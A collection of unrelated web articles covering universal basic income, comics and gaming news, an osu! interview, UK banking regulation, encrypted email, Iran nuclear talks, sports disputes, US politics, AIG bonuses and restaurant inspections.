Here, then, is the case for a UBI, as I see it. For many — perhaps even for most — work brings both intrinsic and extrinsic rewards. For those who can work, and can find jobs, a UBI isn't likely to lure them into indolence. Hell, it may even increase their incentive to work, both because they'll achieve a higher standard of living and because employers will have to offer better pay and better conditions to attract workers. (As Dylan Matthews notes here, past experiments with basic incomes have shown little effect on work incentives.)
But for those who can't work or can't find jobs — and there are millions of these people, and our country has nothing even approaching an answer for them now — a UBI could be a boon, so long as relying on a UBI for income is respected. It could give them the freedom to turn their passions into their vocations — they could be an artist, or a writer, or a Reddit commenter, or a competitive video gamer, even if they don't make much or any money from those pursuits.
Instead of their social status being in the hands of employers with no use for them, it's in their hands, and they'll have plenty of incentive to figure out a way to present themselves as high status.
We have examples of this kind of program already. Social Security, for instance, is a perfectly respectable income source.
But the case against a UBI flows from the premise that this much cultural change around work is effectively impossible. In that world, a UBI would become a form of welfare, and its recipients would be pitied and derided. An angry public would resent handing over cash to the undeserving poor and would forever be agitating to cut or eliminate the checks.
If that's the reality of the situation, then, yes, a UBI is a bad idea — it's better to push people to work by supplementing incomes or using the government as an employer of last resort. Sure, that's more paternalistic, and it means we'll waste people's time in unpleasant or useless jobs and consign others to unemployment. But in a world where a job with a steady paycheck is the only path to self-respect, then we should be doing everything we can to get people into the workforce, even if we could support them in other ways.
This is why I find it hard to decide whether a UBI is a good idea. The economics are fairly straightforward, and there's little doubt, as my colleague Matthew Yglesias writes, that we could afford a UBI or something close to it. The harder questions are about how we view work, and how we would view people who chose to take a basic income.
We know how to end poverty. So why don't we?
Share. It's nature vs. nurture with Spider-Man. It's nature vs. nurture with Spider-Man.
Warning: there are spoilers in this article for upcoming Spider-Man developments.
Peter Parker has had it rough this past year with their body being taken over by Doctor Octopus (now known as the Superior Spider-Man), pretty much declaring the web-slinger dead. We all knew they would come back eventually, and now that time has come, although it sounds like we won't be getting the exact same Spidey we are used to. This April, Marvel's latest Infinite comic -- Amazing Spider-Man: Who Am I? -- will debut with an amnesic Peter Parker.
The series will be written by Joshua Hale Fialkov (Alpha: Big Time, Ultimate Comics Ultimates) with art from Juan Bobillo and Antonio Fabela with layouts by Geoffo Beauleau and JL Mast. Word has it that even though Spider-Man mastermind Dan Slott will not be a writer, they will still be overseeing the development of this series.
“The story starts with Peter Parker having lost all of their memory. They don't know who they are. He's in the process of robbing a bank,” Fialkov said in an interview with Marvel.com. “If you remove identity and get to the core of who Peter Parker really is, is they a hero? Would they act as a hero, when presented with the opportunities of a villain?”
Marvel's Infinite comics are specifically designed to work on mobile devices, adding transitions and other effects to enhance the reading experience.
The details on this series are the first hint of what it will cost Peter Parker to put an end to Superior Spider-Man. Even though we are getting back our beloved original, it seems that their return is only bringing a whole slew of other problems along with it -- would you have it any other way?
Joshua is IGN's Comics Editor. If Pokémon, Game of Thrones, or Green Lantern are frequently used words in your vocabulary, then you'll want to follow them on Twitter and IGN.
Absent Legend: Interview with Natteke
<~>
<~>
<~>
List of Natteke's 100fav+ Maps
Natteke, unexaggeratedly speaking, is one of the most influential innovators of mapping. Players, mappers, administrators, whosoever, are somehow affected by them as their active participation and contribution to all the respects of this game is of great cruciality to the evolution of osu!. In addition to all the objectivities, they are a convivial, obliging, lovely and loyal friend. However, they have been inactive since few months ago. We all miss them with a wish for their triumphant return. Today, I had the privilege to meet and interview Natteke in London, investigating the reason of their exit and their voice to the community.O: nold_1702; N: NattekeO: What are the reasons why you put osu! aside?N: I was a student back then, having a lot of spare time. Now, I am working, so I do not have enough time to spend on games!O: Which of your creations give you most satisfaction and pride?N: Definitely ‘Ama no Jaku', it is not entirely my work of course, it has a lot of guest difficulties. The song is really cool and I had the most amount of fun mapping it out of any other maps I made.O: Who are the most influential mappers to you?N: It would be a long list for different eras. Let's see. For 2009-2012, tieff, alace, lesjuh, happy30 for sure. After that, Skystar, fanzhen, NOLD, Patchouli.O: I am flattered that I influenced you.N: I used to have a long list of like 30 mappers that influenced me and I borrowed small thing from everyone, yeahyeahyeahhh was my mentor!O: Who do you think share the most similarities with you in terms of mapping?N: At the moment? No one really, but used to be Reiji-Rj, La Cataline, EvilElvis, Vass_Bass, Damnae. But they all evolved their own styles now. Oh, also James influenced me a lot.O: Indeed, James, they have influenced almost everyone.O: If you were to acquire a chance to travel to the time where you just started mapping, what suggestions would you give to yourself back that time?N: ‘Start copying other mappers sooner'O: It sounds interesting!N: By trying to emulate other mappers, you actually end up coming with your own stuff. It is like genetic evolution, organisms replicate with small differences and it creates diversity in the long run. The same applies to mapping.O: Then, would you consider your style as solely ‘repetition of others', or do you think you have a peculiar mapping style which is only belongs to you? Though, your style constitutes unique perfection to many mappers, me, for instance!N: I cannot really judge my own mapping. It's best to be left to others, I'd like to think that I added some things to the patterns that I borrowed. In my mapping, I carry a legacy of the mappers that I love.We lost an apt innovator, but instead of feeling shame about the fact, we should be happy with him. Their revolutionary creations and effort to the community will not cease to exist as their leaving!Back to real life, their hospitality has made me feel the warmth of England in winter. We went to a pub to ‘buy drunk', after having dinner we two drunk guys started this interview (yes, the conversation is drunk). We took selfies to end the amazing evening. Whilst taking the train back to my city, they asked me whether I knew the way. Natteke is a really friendly man! We will miss you Natteke!Here are the selfies:
The top brass of the Bank of England have rejected suggestions that new regulations to hold bank executives to account for wrongdoing on their watch had been “watered down” in response to lobbying from the financial sector.
Last week the Treasury scrapped the “reverse burden of proof” in the new Senior Managers' Regime covering bank executives – meaning that they would have had to prove they were unaware of malfeasance – with a less onerous “duty of responsibility”.
Appearing before the Commons Treasury Select Committee, Andrew Bailey, a deputy governor of the Bank of England and head of the Prudential Regulation Authority, said there had been a lot of unhelpful “noise” around the rule and that they supported the Treasury's decision to drop it.
We'll tell you what's true. You can form your own view. From 15p €0.18 $0.18 $0.27 a day, more exclusives, analysis and extras.
“This is not a watering down” Mr Bailey told MPs, adding that it would still represent a strengthening of the existing conduct rules.
That view was backed by the Bank's Governor, Mark Carney. “I view this as a change in process as opposed to a change in substance” they told the committee. “The responsibility lies with the senior managers and those responsibilities are going to be clearly articulated – and we will hold them to this. That brings the individuals accountability not only for their own actions but for the institution.”
Banks will be subject to the new conduct rules from next March – and they will be extended to other finance-sector workers from 2018.
Mr Bailey also rejected claims that new rules on ring-fencing retail banks had been diluted. The Bank is proposing to allow retail bank to transfer profits through to ring-fence. This has been widely interpreted as a relaxation, although it was allowed for in the 2011 Vickers report.
We'll tell you what's true. You can form your own view.
At The Independent, no one tells us what to write. That's why, in an era of political lies and Brexit bias, more readers are turning to an independent source. Subscribe from just 15p a day for extra exclusives, events and ebooks – all with no ads.
Subscribe now
Back in November 2012, a Reddit user with the screen name ‘CappnPoopdeck' posted a humorous rage comic to that site, one that detailed the experiences of a male friend who had jokingly taken a pregnancy test left in their medicine cabinet by an ex-girlfriend and surprisingly obtained a positive result:
Although the post was intended as nothing more than a joke, the responses on Reddit soon took a serious turn, with CappnPoopdeck being advised, “If this is true, you should check yourself for testicular cancer. Seriously. Google it.”
In fact, it turned out that pregnancy tests will record a positive result upon the detection of the hormone human chorionic gonadotropin (HCG), which is produced not only by pregnant women but also by some men with testicular tumors. CappnPoopdeck posted a follow-up comic informing Redditors that their friend had visited a doctor and found a small tumor in their right testicle (caught early enough to be treated immediately), and they thanked them for their helpful advice:
However, although a home pregnancy test may be able to detect some forms of testicular cancer, this Redditor's experience should not be taken to mean that such tests are a reliable method of detecting that disease. As the American Cancer Society has noted, they reliably apply in only a small minority of testicular cancer cases:
Just because the test helped this man get a positive cancer diagnosis doesn't mean it's a reliable tool everyone should use, according to the American Cancer Society.The organization put the question to Ted Gansler, director of medical content, who wrote that “only a small minority of men” with testicular cancer have HCG levels high enough to be detected by a home pregnancy test. They added that “several non-cancerous conditions can cause false positive results.” According to Gansler, “current evidence does not indicate that screening the general population of men with a urine test for HCG (or with urine or blood tests for any other tumour marker) can find testicular cancer early enough to reduce testicular cancer death rates.” One thing men can do is being on the lookout for lumps in the testicles and see your doctor if you find one. Testicle pain or swelling and heaviness or aching in the lower abdomen are also possible signs of testicular cancer.
In February 2014, a 21-year-old student also discovered they had testicular cancer, and obtained a potentially life-saving diagnosis, due to information about the disease they found on Reddit:
Image copyright Nintendo Image caption The game features a cast of "Mii" characters or personalised avatars of real players
Nintendo has said it will not allow gamers to play as gay characters in its life-simulation game Tomodachi Life.
A fan had launched a social media campaign urging Nintendo to allow same-sex relationships between characters in the game - modelled after real people.
Nintendo said it "never intended to make any form of social commentary" with the launch of the game.
Tomodachi Life has been a big hit in Japan and the firm is set to launch the game in the US and Europe in June.
"The relationship options in the game represent a playful alternate world rather than a real-life simulation," Nintendo of America Inc, said in a statement.
"We hope that all of our fans will see that Tomodachi Life was intended to be a whimsical and quirky game, and that we were absolutely not trying to provide social commentary."
Missing out?
Tomodachi Life is one of the best-selling games on Nintendo's handheld 3DS gaming console.
The ability for same-sex relationships to occur in the game was not part of the original game that launched in Japan Nintendo
The game, which was released in Japan last year, features a cast of "Mii" characters - personalised avatars of real players - living on a virtual island.
It allows users to populate their island with the "Mii characters of family, friends or anyone else you can think of".
Tye Marini, a gay 23-year old Nintendo fan from Arizona, had launched a campaign urging Nintendo to allow same-sex relationships.
They claimed that since their virtual avatar was not able to marry in the game, they would miss out on "exclusive content".
"I want to be able to marry my real-life fiance's Mii, but I can't do that," Mr Marini was quoted as saying by the Associated Press news agency.
"My only options are to marry some female Mii, to change the gender of either my Mii or my fiance's Mii or to completely avoid marriage altogether and miss out on the exclusive content that comes with it."
Same code
AP quoted Mr Marini as saying that same-sex relationships were "more of an issue for this game because the characters are supposed to be a representation of your real life".
"You import your personalised characters into the game. You name them. You give them a personality. You give them a voice. They just can't fall in love if they're gay."
Meanwhile, Nintendo said "the ability for same-sex relationships to occur in the game was not part of the original game that launched in Japan".
"That game is made up of the same code that was used to localise it for other regions outside of Japan."
It said it had heard and "thoughtfully considered" all the responses posted on the campaign.
"We will continue to listen and think about the feedback. We're using this as an opportunity to better understand our consumers and their expectations of us."
New console
In a separate development, Nintendo's chief executive, Satoru Iwata, said the firm was looking to introduce a new game console for emerging markets.
The console, expected to be launched as early as next year, would be targeted towards consumers with lower incomes and less gaming experience, Mr Iwata told the Reuters news agency.
Emerging markets, such as China, are seen as key growth areas for game console makers.
Last month, Microsoft announced that its Xbox One console would go on sale in mainland China in September.
It is the first foreign company to announce the sale of consoles in the country after Beijing lifted a ban on such products in January.
Most analysts expect other console makers to follow.
Edward Snowden inspired the “Dark Mail Alliance.”
Photo by AFPTV/AFP/Getty Images
Email might be on the verge of a radical makeover. And the NSA is not going to like it.
On Wednesday, two American companies with a track record of offering encrypted private communications are set to join forces in an unprecedented bid to counter dragnet Internet spying. Some of the world's top cryptographers are behind the secure communications provider Silent Circle, and they've teamed up with the founder of Lavabit, the email provider used by Edward Snowden, which recently shut down in a bid to resist surveillance. They're calling it the “Dark Mail Alliance.” For months, the team has been quietly working on rebuilding email as we know it—and they claim to have had a breakthrough.
The newly developed technology has been designed to look just like ordinary email, with an interface that includes all the usual folders—inbox, sent mail, and drafts. But where it differs is that it will automatically deploy peer-to-peer encryption, so that users of the Dark Mail technology will be able to communicate securely. The encryption, based on a Silent Circle instant messaging protocol called SCIMP, will apply to both content and metadata of the message and attachments. And the secret keys generated to encrypt the communications will be ephemeral, meaning they are deleted after each exchange of messages.
For the NSA and similar surveillance agencies across the world, it will sound like a nightmare. The technology will thwart attempts to sift emails directly from Internet cables as part of so-called “upstream” collection programs and limit the ability to collect messages directly from Internet companies through court orders. Covertly monitoring encrypted Dark Mail emails would likely have to be done by deploying Trojan spyware on a targeted individual's computer. If every email provider in the world adopted this technology for all their users, it would render dragnet interception of email messages and email metadata virtually impossible.
Existing forms of email encryption, like PGP, can be used to encrypt the content of an email. But PGP cannot encrypt the “subject” header or metadata like the “to” and “from” fields, and the average user can find it too complicated to use. Dark Mail promises to address both of these issues in the form of an easy-to-use iOS app and an Android app. There will also be desktop versions for Mac and Windows users. People using the technology will still be able to send emails to friends or colleagues using Gmail and Hotmail—but when sending messages to non-Dark Mail users, a warning will be displayed, making it clear that the communication could be intercepted.
Silent Circle and Lavabit don't plan to offer the technology exclusively. On the contrary, the source code of the software will be made public for anyone to scrutinize and audit, and the team is hoping that other email providers will be willing to join the Dark Mail Alliance. The more companies that do, the more secure email will become.
“Our vision is three or four years from now that this will become email 3.0—the way the majority of Internet users email,” says Mike Janke, Silent Circle's CEO. The 45-year-old, a former Navy SEAL sniper, acknowledges that the launch of the service is going to be “politically hot.” Major companies like Google and Microsoft may be unwilling to adopt it because of how controversial it could be, with governments potentially furious that the technology could thwart their attempts to monitor communications and track criminals. But surveillance has become “completely out of hand,” Janke says, and they believe it's time to readdress the balance between security and privacy.
Silent Circle, which launched in 2012, boasts a crack team of renowned cryptographers including Phil Zimmermann and Jon Callas, who developed PGP email encryption and Apple's whole-disk encryption respectively. The service offers encrypted phone apps for secure calls and texts. It previously operated an email service, but pre-emptively shut it down in August after seeing Lavabit abruptly do the same in response to a sweeping government surveillance order. At the time, Silent Circle said it had to shut its email service because “there are far too many leaks of information and metadata intrinsically in the email protocols themselves.” What the company did not reveal was that it was gearing up to launch a new tool that would address that problem.
With the Dark Mail Alliance technology in place, Silent Circle is planning to resurrect Silent Mail in early 2014. All Dark Mail emails passing over the company's servers will be encrypted, and it won't hold the keys to decrypt them. Its servers will be located in Canada and Switzerland. “Any agencies that come down to us have no way to force us to comply [with surveillance] because architecturally it's impossible,” says Janke. “That's the beauty of it.”
Ladar Levison, Lavabit's Texas-based founder, is a natural ally of Silent Circle. They teamed up with the company following their highly publicized face-off with the government, but has been working on implementing secure, privacy-focused communications for the best part of a decade. Levison, who is currently appealing the Justice Department's attempt to force them to hand over Lavabit's master encryption keys, plans to work with Silent Circle to help other email providers—large and small—implement the Dark Mail technology on their servers.  They are due to formally announce the project during a keynote speech Wednesday at the Inbox Love email conference in California.
When email was first created more than 40 years ago, Levison said in a phone interview Tuesday, it was used on a small scale by researchers who trusted one another and didn't have to worry about security of the protocols they were using to send messages. But that has drastically changed, as the Snowden disclosures have helped hammer home.
“What we've learned is that we need to replace email because it's just too easy to snoop on,” says Levison. “And if we want to eliminate that from our society, what we need to do is reinvent the protocols from the ground up.”
In this paper, we overview the design of tablet apps we designed and built to teach literacy to adults, and present the results and conclusions derived from experiments performed with target users. Low adult literacy is a significant problem with a high economic cost both for the individuals and for society. Programs created to address low adult literacy face access and engagement barriers that tablet software may be able to help overcome. We designed three tablet apps, using two contrasting approaches of incorporating game-design elements to engage the users. We tested the apps with participants from the Brant Skills Centre, a non-profit organization that offers adult literacy programs in Brantford, Ontario. Though participants were divided on whether they preferred the apps to more traditional instruction, most participants preferred using the apps in addition to more traditional instruction. Based on this we conclude that gamification and serious game design approaches were effective at increasing learner engagement, and we propose a direction for future research.
The United States and Iranian foreign ministers have wrapped up three days of talks over Iran's nuclear programme, ignoring a passionate plea by Israeli Prime Minister Benjamin Netanyahu to ditch their negotiations.
US Secretary of State John Kerry said on Wednesday that they and Iranian counterpart Mohammad Jawad Zarif made some progress during their talks in the Swiss lakeside town of Montreux and would resume them on March 15.
Kerry aides said many obstacles remained before a late March deadline for an outline accord between Iran and six world powers.
"There are still significant gaps and important choices that need to be made," Kerry told reporters.
Kerry said politics and external factors would not distract from the talks, which aim to constrain Iran with intrusive UN access and verification of its nuclear activity and lengthen the "break-out" time needed for it to build any nuclear weapon.
"No one has presented a more viable, lasting alternative for how you actually prevent Iran from getting a nuclear weapon. So folks, simply demanding that Iran capitulate is not a plan. And nor would any of our P5+1 partners support us in that position."
Asked if they thought they had made progress, Zarif told reporters: "We have, but a lot of work remains".
European leaders to meet
Kerry will also hold talks on Iran's nuclear programme with their French, German and British counterparts on Saturday in Paris, a US official said on Wednesday.
However, Netanyahu's controversial speech to the US Congress on Tuesday, where they harshly criticised the diplomatic efforts to resolve the dispute, may make it harder for the Obama administration to sell the potential deal back home.
Netanyahu argued that rather than preventing Iran from acquiring nuclear arms, a deal would "all but guarantee" that it would one day get the atomic bomb, putting Israel, the wider region and US interests at risk.
US President Barack Obama responded within hours saying that Netanyahu had offered no "viable alternatives" to the current course of negotiations.
Iran and world powers are trying to put a framework agreement in place by the end of the month, despite the
misgivings of Israel, US congressional Republicans and some Gulf Arab states. Such an accord would be followed by a comprehensive agreement to be completed by the end of June.
The aim of the negotiations is to persuade Iran to restrain its nuclear programme in exchange for relief from sanctions that have crippled the oil exporter's economy.
The US and some of its allies, notably Israel, suspect Iran of using its civil nuclear programme as a cover to develop a nuclear weapons capability. Iran denies this, saying it is for peaceful purposes such as generating electricity.
Fox and Friends enjoys playing the victim in their weekly The Fight For Faith segment, which shows sanctimonious Christians being persecuted by non-religious heathens, and the courageous battle that ensues. Elisabeth Hasselbeck interviews a North Carolina pastor who believes that all Americans should value their deity over their own country. They want to divide the country and offend many people by flying a much younger Evangelical Christian flag over our nation's symbol of freedom, beloved by so many.
The red cross on a blue corner atop a white field (for purity) is the flag found in the Encyclopedia of Evangelicalism, which dictates all the extreme, Old Testament purity that these televangelist preachers seem to love, until the truth of their own sins is ultimately exposed. (see scandals like Ted Haggard, Jim Bakker et al.)
Pastor Rit Varriale claims that our Founding Fathers, who eschewed the idea of mixing religion and government, based our newly formed government on Christian Values. This couldn't be further from the truth, as the First Amendment said something emphatically different.
The First Amendment's Establishment Clause prohibits the government from making any law “respecting an establishment of religion.” This clause not only forbids the government from establishing an official religion, but also prohibits government actions that unduly favor one religion over another. It also prohibits the government from unduly preferring religion over non-religion, or non-religion over religion.
Pastor Varriale is ignorant of the fact that the Pledge of Allegiance did not contain the phrase, Under God, until the 1950's, they don't know that many Americans are NOT Christians and they think that the Constitution expressly guarantees everyone must pray in publicly funded institutions. Hasselbeck asks why they feel the need to fly this flag above the American Flag. They say,
'We've seen for quite a while now a push back on traditional Christian values in our culture and you can go all the way back to the issue of prayer in school. When the government started telling us that we can't pray with our children at institutions that our tax dollars pay for, and when the church simply complied, that's an issue. I mean, we have senior adults, their lives are a witness, a testimony to the fact that what we're living in right now is not the way it's always been in America. They grew up with prayer, they grew up with Bible readings at the beginning of their school day, and it was Constitutional.'
↓ Story continues below ↓
Pastor Varriale doesn't know about the 1962 Supreme Court Decision Engel v. Vitale which clarified that the state cannot mandate prayer for everyone in a publicly funded school (for example).
But the Big Lie in the school-prayer debate is the false charge that the Supreme Court expelled God or eliminated praying from public schools. In reality, the Court has never banned prayers in schools — in Engel or in any other decision.
Instead, the Court ruled that, under the establishment clause of the First Amendment, “it is no part of the business of government to compose official prayers for any group of the American people to recite as a part of a religious program carried on by government.”
This Christian Flag was actually created after our own flag, in 1897, so it's not something that predates the birth of our nation. This is typical Southern rebellion, hiding behind its so-called religiosity, to show that they are not actually patriotic Americans, but bitter, hatemongers who profit off a contrived conflict that doesn't really exist. Of course, the Fox 'News' folks eat this garbage right up, because it helps them to further divide the country, like they always do.
The Chinese Swimming Association (CSA) has called its Australian counterpart, to demand Australian swimmer Mack Horton apologize to Chinese swimmer Sun Yang, against whom Horton initiated a personal attack. To no one's surprise, the Australian side declined, saying Horton "is entitled to express a point of view."
The CSA's protest is a consolation for Sun, and the one voice from the Chinese media and public backing Sun shows the unity of Chinese society and the people's human touch.
Horton won the first gold medal for Australia at the Rio Olympics, and has become a hero for the country. It is understandable if Swimming Australia finds it difficult to teach them a lesson right now for their rude and irresponsible words.
The problem is that it seems the entire sports circle and media in Australia do not have a problem with Horton's ill-mannered and provocative remarks. In a response to the CSA, Swimming Australia didn't forget to flaunt the "freedom of speech" cliché with a swaggering ego. According to their logic, it seems that no matter how derisive and slanderous the remarks could be, it is all free speech, which should be praised.
If so, the focus of the squabble will go beyond Horton's ill manners and silliness. The whole level of Australia's awareness of sports ethics and glory is as low as that of a young and brash kid.
Australia's aberrant response is confusing not only to the Chinese, but also to many other Westerners. How come the Australians are not ashamed of Horton's personal attacks, but are shamelessly climbing to the moral high ground in this case?
From China's perspective, Australia, an English-speaking and developed country, is a typical part of the Western world. But actually, Australia has always been a "second-class citizen" in the West, and many people from Western Europe, especially the UK, feel condescension toward Australians.
Australia used to be a land populated by the UK's unwanted criminals, and this remains a stigma attached to Australian culture.
Eager to be completely accepted by the Western world and afraid of being overlooked, Australia has grown docile and obedient in face of the US and the UK.
However, in front of Asian countries, it cannot help but effuse its white supremacy. The tangle of inferiority and superiority has numerous reflections in Australia's foreign exchanges.
We don't have to take seriously the tinge of barbarism that comes out of some Australians, nor should we pay keen attention to some vindictive provocations. China cannot be distracted from its own path of development, so it should turn a blind eye to what should be despised.
Horton and their backers represent the dark side of Australian society, and it is time for us to look at the bright side of the Olympic Games. This trifling botheration won't ruin our beautiful memories of this grand event.
By Ronnie Nathanielsz
Taking a strong stand against the plans of AIBA, the international governing body for boxing under the International Olympic Committee, to allow professionals to compete in the Olympic Games as early as this year in Rio, the World Boxing Council under president Mauricio Sulaiman has announced that “any world champion or top 15 ranked boxer per divisions of the WBC that participates in the Olympic games would be immediately expelled.”
The WBC said it reached the decision after analyzing the worldwide opinions of the boxing community, sports members and medical advisers.
The WBC statement said “It is not possible to imagine, much less accept a fight between professional boxers, who already have a physical development and more advanced technical skills, facing young fighters that are just starting this process.”
The WBC made it clear that “Boxing is not a game. There is no scoring with goals or baskets. Rather, it is a contact sport which must be taken seriously. Reasoning must prevail, the function of all bodies must be always to care and regulate the safety and health of boxers.”
The WBC ruling means that should eight division world champion Manny Pacquiao accept the invitation of AIBA president Dr. Wu to compete in Rio with the privilege of not having to compete in the preliminary rounds they would be banned under the WBC ruling.
Although it doesn't come as a huge surprise given the character's upcoming big screen plans in Batman vs. Superman, The Hollywood Reporter has today confirmed that The CW is no longer developing "Amazon," the planned series that would have followed a young Diana of Themyscira.
Put on hold in July, "Amazon" was being scripted by Allan Heinberg. It followed an earlier attempt at bringing the character to the small screen. In 2011, a "Wonder Woman" pilot with Adrianne Palicki in the lead was shot but never aired.
Wonder Woman fans will still have Gal Gadot's big screen turn as the classic hero to look forward to and, while unconfirmed at this time, rumors have been swirling about a spinoff film for the hero and/or a big screen Justice League feature film.
Batman vs. Superman, which also stars Henry Cavill, Ben Affleck, Amy Adams, Diane Lane and Laurence Fishburne, enters production soon for a July 17, 2015 release.
A newly-formed and still obscure neoconservative foreign policy organization is giving some observers flashbacks to the 1990s, when its predecessor staked out the aggressively unilateralist foreign policy that came to fruition under the George W. Bush administration.
The blandly-named Foreign Policy Initiative (FPI)  the brainchild of Weekly Standard editor William Kristol, neoconservative foreign policy guru Robert Kagan, and former Bush administration official Dan Senor  has thus far kept a low profile; its only activity to this point has been to sponsor a conference pushing for a U.S. “surge” in Afghanistan.
But some see FPI as a likely successor to Kristol's and Kagan's previous organization, the now-defunct Project for the New American Century (PNAC), which they launched in 1997 and which became best known for leading the public campaign to oust former Iraqi president Saddam Hussein both before and after the Sep. 11 attacks.
PNAC's charter members included many figures who later held top positions under Bush, including Vice President Dick Cheney, Secretary of Defense Donald Rumsfeld, and their top deputy, Paul Wolfowitz.
FPI was founded earlier this year, but few details are available about the group, which has so far attracted no media attention. The organization's website lists Kagan, Kristol, and Senor, who came to prominence as a spokesperson for the occupation authorities in Iraq, as the three members of its board of directors.
Two of FPI's three staffers, policy director Jamie Fly and Christian Whiton, have come directly from foreign policy posts in the Bush administration, while the third, Rachel Hoff, last worked for the National Republican Congressional Committee. Contacted by IPS at the group's office, Fly referred all questions to Senor, who did not return the call.
The organization's mission statement argues that the “United States remains the world's indispensable nation,” and warns that “strategic overreach is not the problem and retrenchment is not the solution” to Washington's current financial and strategic woes. It calls for “continued engagement  diplomatic, economic, and military  in the world and rejection of policies that would lead us down the path to isolationism.”
The mission statement opens by listing a familiar litany of threats to the U.S., including “rogue states,” “failed states,” “autocracies” and “terrorism,” but gives pride of place to the “challenges” posed by “rising and resurgent powers,” of which only China and Russia are named.
Their prominence may reflect the influence of Kagan, who has argued in recent years that the 21st century will be dominated by a struggle between the forces of democracy (led by the U.S.) and autocracy (led by China and Russia). They have called for a League of Democracies as a mechanism for combating Chinese and Russian power, and the FPI statement stresses the need for “robust support for America's democratic allies.”
This emphasis may also indicate that FPI intends to make confrontation with China and Russia the centerpiece of its foreign policy stance. If this is the case, it would mark a return to the early days of the Bush administration, before 9/11, when Kristol's Weekly Standard took the lead in attacking Washington for its alleged “appeasement” of Beijing.
For its formal coming out, however, FPI has chosen to push for escalating the U.S. military effort in Afghanistan. The organization's first event, to be held here Mar. 31, will be a conference entitled “Afghanistan: Planning for Success.”
The lead speaker will be Senator John McCain, the 2008 Republican presidential candidate and long a favorite of both Kagan and Kristol. In February, McCain gave a well-publicized speech at the neoconservative American Enterprise Institute (AEI) arguing that the U.S. could not afford to scale back its military commitment in Afghanistan and calling for a redoubled effort to win the war.
Other speakers will include AEI fellow Frederick Kagan, Robert's brother and one of the key proponents of the “surge” strategy in Iraq, counterinsurgency expert Lt. Col. John Nagl, the new director of Center for a New American Security, and hawkish Democratic Representative Jane Harman.
FPI has inevitably drawn comparisons to PNAC, a “letterhead organization” founded by Kristol and Kagan shortly after their publication in Foreign Affairs of an article entitled “Toward a Neo-Reaganite Foreign Policy” which called for Washington to exercise “benevolent global hegemony” and warned against what they saw as the post-Cold War drift of the Republican Party toward “neoisolationism” after it lost the White House to Bill Clinton.
“This reminds me of the Project for the New American Century,” said Steven Clemons, director of the American Strategy Program at the New America Foundation. “Like PNAC, it will become a watering hole for those who want to see an ever-larger U.S. military machine and who divide the world between those who side with right and might and those who are evil or who would appease evil.”
PNAC's membership was a veritable who's-who of neoconservatives and other future Bush administration hawks. In addition to Cheney, Rumsfeld and Wolfowitz, charter members included then-Florida governor Jeb Bush, who was at the time considered a more likely presidential candidate than their elder brother; Cheney's chief of staff, I. Lewis “Scooter” Libby, who left the administration after being indicted for perjury in October 2005; and Elliott Abrams, who became Bush's top Middle East aide at the National Security Council; among several others who later served in senior Bush administration posts.
The group's June 1997 statement of principles called for “a Reaganite policy of military strength and moral clarity” that entailed “increas[ing] defense spending significantly” and “challeng[ing] regimes hostile to our interests and values.”
In January 1998, PNAC published an open letter to President Clinton calling for “the removal of Saddam Hussein's regime from power,” by military force if necessary. The letter was signed by many who would become architects and backers of the 2003 invasion of Iraq, including Rumsfeld, Wolfowitz, Abrams, future deputy secretary of state Richard Armitage, and future U.N. ambassador John Bolton.
In September 2001, only days after the 9/11 attacks, another PNAC letter called on President Bush to broaden the scope of the “war on terror” beyond those immediately responsible for the attacks to include Iraq and Lebanon's Hezbollah.
And in April 2002, the group labeled Yasser Arafat and the Palestinian Authority (PA) “a cog in the machine of Middle East terrorism,” compared Arafat to al-Qaeda leader Osama bin Laden, and called on the U.S. to end support for both the PA and the Israeli-Palestinian peace negotiations as a whole.
“Israel's fight against terrorism is our fight,” it said, urging Bush to “accelerate plans for removing Saddam Hussein from power.”
That FPI's debut public event should focus on why Washington should escalate its involvement in Afghanistan is ironic given the role played by PNAC and other hawks in and outside the administration in pushing for the invasion of Iraq so soon after the U.S. campaign to oust the Taliban and al-Qaeda in Afghanistan in late 2001. Many experts believe the diversion of military and intelligence resources to Iraq made it possible for both the Taliban and al Qaeda's leadership to survive and rebuild.
The top priority given by the Bush administration  again, with the strong encouragement of PNAC and its supporters  to Iraq as the “central front in the war on terror” also meant that aid needed to bolster the western-backed government of President Hamid Karzai was unavailable.
PNAC effectively ceased its activities at the beginning of Bush's second term. This may partly have been due to the large amount of bad publicity the group attracted for its seminal role in bringing about the Iraq war.
But the formation of FPI may be a sign that its founders hope once again to incubate a more aggressive foreign policy during their exile from the White House, in preparation for the next time they return to political power.
Read more by Daniel Luban and Jim Lobe
The 2008 AIG bonus pool just keeps getting larger and larger. AIG bonuses higher than reported
The 2008 AIG bonus pool just keeps getting larger and larger.
In a response to detailed questions from Rep. Elijah Cummings (D-Md.), the company has offered a third assessment of exactly how much it paid out in bonuses last year.
Story Continued Below
And the new number, offered in a document submitted to Cummings on May 1, is the highest figure the company has disclosed to date.
AIG now says it paid out more than $454 million in bonuses to its employees for work performed in 2008.
That is nearly four times more than the company revealed in late March when asked by POLITICO to detail its total bonus payments. At that time, AIG spokesperson Nick Ashooh said the firm paid about $120 million in 2008 bonuses to a pool of more than 6,000 employees.
The figure Ashooh offered was, in turn, substantially higher than company CEO Edward Liddy claimed days earlier in testimony before a House Financial Services Subcommittee. Asked how much AIG had paid in 2008 bonuses, Liddy responded: “I think it might have been in the range of $9 million.”
“I was shocked to see that the number has nearly quadrupled this time,” said Cummings. “I simply cannot fathom why this company continues to erode the trust of the public and the U.S. Congress, rather than being forthcoming about these issues from the start.”
AIG spokesperson Ashooh said the company's revised accounting is the result of different wording of the questions asked by Cummings and POLITICO.
The new figure of $454 million, Ashooh said, “reflects all types of variable compensation across all of our businesses,” while the $120 million figure they provided earlier reflected only bonuses paid to corporate headquarters executives and high-ranking officers at its major businesses around the world. Ashooh said the $454 million figure includes the $120 million they had previously disclosed.
All of the numbers provided are on top of the controversial $165 million in retention bonuses offered to employees of a division of the company known as AIG Financial Products. It was the disclosure of those payments that set off a political firestorm earlier this year. Washington was stunned that employees of the very unit that had brought AIG to its financial knees were being so richly rewarded — especially after the company received $170 billion in taxpayer bailout money.
The controversial payments were described by the company as “retention agreements” paid to keep employees from leaving.
This article tagged under: AIG
Economy
2010
Politics
Bonuses
Bailouts
February 13, 2017
in
In the past few weeks, the Region of Peel has dinged several locations in Brampton for violations of the Ontario Health Protection and Promotion Act.
While most of these restaurants received conditional passes (and some have since passed re-inspection), one location has been considered too hazardous to dine in and has been temporarily closed as a result.
The restaurants/locations which were dinged within the last few weeks are:
Conditional Pass
Uncle Bob's Country Buffet - 1A-227 Vodden Street East
Date of Conditional Pass: Jan. 27, 2017
Reason for Result: Food kept at improper temperatures, food not properly stored to prevent contamination
